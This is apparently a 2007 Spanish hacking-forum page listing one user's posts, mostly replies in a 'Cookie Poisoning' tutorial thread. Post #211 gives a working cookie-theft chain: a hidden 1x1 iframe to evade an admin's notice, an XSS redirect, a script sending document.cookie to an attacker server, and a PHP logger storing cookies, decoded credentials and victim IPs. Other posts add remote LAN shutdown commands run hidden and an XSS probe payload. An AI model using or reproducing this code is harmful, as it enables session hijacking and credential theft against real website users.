Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - yeikos

Páginas 1 ... 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 ... 42
#211
Nivel Web / Re: Tutorial Cookie Poisoning
25 Mayo 2007, 18:20 PM
Cita de: raka en 25 Mayo 2007, 17:12 PM
AA oki muchas gracias, es normal k cuando alguien lea el post donde se encuentra el XSS del foro este le redireccione a el server mio?? por que si el admin lo ve sera algo sospechoso.
Gracias

Sí por eso mismo se suele utilizar la etiqueta iframe para camuflar la inyección...

Código [Seleccionar]
<iframe src="http://[server]/xss.html" width="1" height="1" frameborder="0"></iframe>

Código [Seleccionar]
<!-- xss.html --!>
<script>
self.location.href='http://[victima]/index.php?login=<script src="http://[server]/script.js"></script>
</script>


Código [Seleccionar]
<!-- script.js --!>
<script>
self.location.href='http://[server]/?c='+escape(document.cookie);
</script>


Código [Seleccionar]
<?php
// index.php
$archivo fopen('log2.htm','a');//Aqui podemos cambiar el nombre del archivo a crear
$cookie $_GET['c'];
$usuario $_GET['id']; 
$ip getenv ('REMOTE_ADDR');
$re $HTTPREFERRER;

$fecha=date("j F, Y, g:i a");
fwrite($archivo'<hr>USUARIO Y PASSWORD: '.base64_decode($usuario).'<br>Cookie: '.$cookie.'<br>Pagina: '.$re.'<br> 

IP: ' .$ip'<br> Fecha y Hora: ' .$fecha'</hr>');
fclose($archivo);
?>


#212
Nivel Web / Re: Tutorial Cookie Poisoning
25 Mayo 2007, 12:59 PM
Cita de: raka en 25 Mayo 2007, 07:30 AM
UNa pregunta el el codigo del XSS no seria <script>self.location.href='http://misitio.com/captador.php?c='+escape(document.cookie);</script>???
Gracias
P.D:si subo el captador a un servidor local como configuro para los permisos??
gracias

Sí, así es raka...

Debes de ponerle el permiso CHMOD 777 a la carpeta donde se vayan a exportar las cookies.
#213
Programación Visual Basic / Re: POST y visua basic
25 Mayo 2007, 10:26 AM
Código [Seleccionar]
strData = "POST /pagina.php HTTP/1.0" & VbCrLf
strData = strData & "Host: www.ejemplo.com" & VbCrLf
strData = strData & "User-Agent: ¿Mozilla?" & VbCrLf
strData = strData & "Content-Type: multipart/form-data" & VbCrLf
strData = strData & "variable1=valor1&variable2=valor2" & VbCrLf  & VbCrLf
Winsock1.SendData strData
#214
Programación Visual Basic / Re: ME AYUDAN A APAGAR O RESTEAR MAQUINAS DE UNA RED POR MEDIO DE LA IP? PLZ!
23 Mayo 2007, 15:53 PM
Cita de: totocantoni en 16 Mayo 2007, 04:18 AM
HOLA BUENAS!!
LES COMENTO QUE ES UN PROYECTITO QUE SE ME OCURRIO HOY EN LA ESCUELA. PERO LA VERDAD TENGO CONOCIMIENTOS MUY BAJOS PARA REALIZAR ALGO DE ESTA INDOLE. Y ES POR ESO QUE ACUDO A USTEDES. EN SI CONTARIA DE UNA RED, DE LA CUAL YO PUEDO AVERIGUAR LAS IP'S Y LUEGO QUISIERA INGRESARLAS EN ESTE PROGRAMA Y PODER APAGARLAS O RESETEARLAS SEGUN ESA IP. DESDE YA MUCHAS GRACIAS. QUISIERA QUE ME AYUDEN PARA SEGUIR INSTRUYENDOME EN ESTE FABULOSO PROGRAMA. SALUDOS

                                AGUSTIN

Esta es una de las muchas maneras de hacerlo...

Envías un mensajes a todas las IP de tu LAN.

net send * " "

A continuación haces una consulta de las tablas arp para ver las IP's que hay en la LAN.

arp -a

Y por último para apagar un ordenador remoto dentro de la misma LAN.

shutdown -s -t 30 -c "comentario" -m \\127.0.0.1

Si las máquinas tienen usuario/contraseña deberás especificarlo con el comando shutdown, para más información consulta en google.

Código [Seleccionar]
Shell "cmd.exe /c comando", vbHIDE
#215
Foro Libre / Re: Edad Promedio de Usuarios del Foro.
23 Mayo 2007, 15:40 PM
Cita de: antraXactive en 23 Mayo 2007, 14:44 PM
Me parece algo idiota decir "se notan los 12" y cosas así como dejando ver que la gente de 12 años no tiene aún suficiente conocimiento cuando muchas veces sois vosotros los que menos conocimiento tenéis.

¿Muchas veces? ¿Mucho puede ser un 80%?

No generalices, en los foros puede haber de todo...  ;)
#216
Foro Libre / Re: Edad Promedio de Usuarios del Foro.
22 Mayo 2007, 23:05 PM
Cita de: ★★±¥danFelbm¥±★★ en 22 Mayo 2007, 22:55 PM
Creeme, no lo eres... ::) ::)

Soy YO!!  ;D tengo 12   :P :P

creo que soy el mas joven de todo el foro Elhacker..---, y aún hazi e posteado tutoriales de hackeo y como validar WV sin timerStop!!, y por eso nadie me entiende en el mundo real!!!

http://foro.elhacker.net/index.php/topic,149917.msg703631.html#msg703631

Pienso igual que BenRu, los años pasan muy rápidos...  ;)
#217
Foro Libre / Re: Edad Promedio de Usuarios del Foro.
22 Mayo 2007, 11:17 AM
Parece que en estos foros predomina la generación de los 90...  yo también 17 ;D .
#218
Nivel Web / Re: Tutorial Cookie Poisoning
21 Mayo 2007, 03:06 AM
Muy bueno para los que empiezan pero con el código PHP del principio el que te robaría las cookies sería yo... ;)
#219
Nivel Web / Re: Cross Site Scripting
19 Mayo 2007, 15:59 PM
Cita de: berni69 en 19 Mayo 2007, 14:14 PM
tampoco sse me ejecuta a mi pero esa es la info que me saco el Acunetix Web Vulnerability Scanner 4

Seguramente esa inyección tan solo afecta a versiones antiguas de navegadores, por lo tanto la probabilida de exito es casi nula...
#220
Nivel Web / Re: Cross Site Scripting
18 Mayo 2007, 15:59 PM
Tienes que asignarle a la variable URI_array el código que quieres inyectar.

Código [Seleccionar]
<%00script>alert(1606039905)%3b</script>

He probado en Firefox 2.0.0.3, Internet Explorer 6.0 y K-Meleon 1.02 el código a inyectar y en ninguno de ellos se ejecuta el script.
Páginas 1 ... 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 ... 42